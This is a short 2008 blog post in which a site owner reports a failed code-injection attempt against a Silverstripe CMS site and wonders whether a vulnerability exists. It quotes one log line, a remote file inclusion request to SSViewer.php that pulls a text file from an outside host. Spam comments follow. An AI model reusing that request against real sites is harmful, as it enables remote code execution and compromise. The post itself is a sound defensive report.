Blog » A Hacking Attempt Targeting the Silverstripe CMS

A Hacking Attempt Targeting the Silverstripe CMS

This morning the first Silverstripe specific hacking attempt occurred. Three separate IP addresses from across the globe attempted to perform code-injection exploits on this website for about an hour. It is clearly targeting Silverstripe because the server logs show references to Silverstripe specific files, e.g.:

72.29.70.163 - - [28/Aug/2008:09:53:09 -0400] "GET /sapphire/core/SSViewer.php?cacheFile=http://misindo.com/~jemari/backup.txt?? HTTP/1.1" 200 5 "-" "libwww-perl/5.810"

At this stage it appears that the attack was unsuccessful. However, it is the first time that an attack targets the CMS that this site is using. This does raise the question as to whether someone has found a security vulnerability in Silverstripe. This attack could have referenced Silverstripe for two possible reasons:

  • A script has scanned through the Silverstripe files and is programmed to search for exploits in random files, or
  • Someone has found an exploit that works under certain situations (e.g., with a poorly configured server) and is scanning the internet for vulnerable Silverstripe websites.
I cannot determine which of these two is most likely from the server logs. If a reader that is more knowledgeable on Silverstripe internals and/or such exploits, please leave a comment or contact me. For those who are interested or just curious, the full log of the attack can be found on this page.



Blog » A Hacking Attempt Targeting the Silverstripe CMS

Post your comment

Comments

  • Im glad I have taken the time to see this keep up the excellent work.

    Posted by دانلود آهنگ, 14/09/2017 7:50am (9 days ago)

  • You have a very beautiful site and I was very happy to see your beautiful content.

    Posted by دانلود فیلم, 14/09/2017 7:48am (9 days ago)

RSS feed for comments on this page | RSS feed for all comments


Blog » A Hacking Attempt Targeting the Silverstripe CMS